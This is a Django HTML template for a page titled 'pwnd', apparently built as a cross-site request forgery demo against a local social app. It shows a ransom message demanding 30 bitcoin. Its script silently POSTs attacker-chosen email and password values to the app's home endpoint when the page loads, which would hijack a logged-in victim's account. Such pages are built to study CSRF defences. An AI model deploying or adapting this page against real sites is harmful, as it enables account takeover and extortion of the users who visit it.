<!doctype html>
{% load static %}
<html lang="en">
<title>pwnd</title>
You have been pwned. Send 30 btc to this wallet to regain access -
<br>
<img src ="{% static "download.png" %}" >
<body >
  <script>

      var xhr = new XMLHttpRequest();
      var post_url = "http://127.0.0.1:8000/social/home/" ;
      xhr.open("POST",post_url,true);
      xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
      var data = "email=hacker@gmail.com&password=hacked"
      xhr.send(data)

  </script>
  </body>
</html>
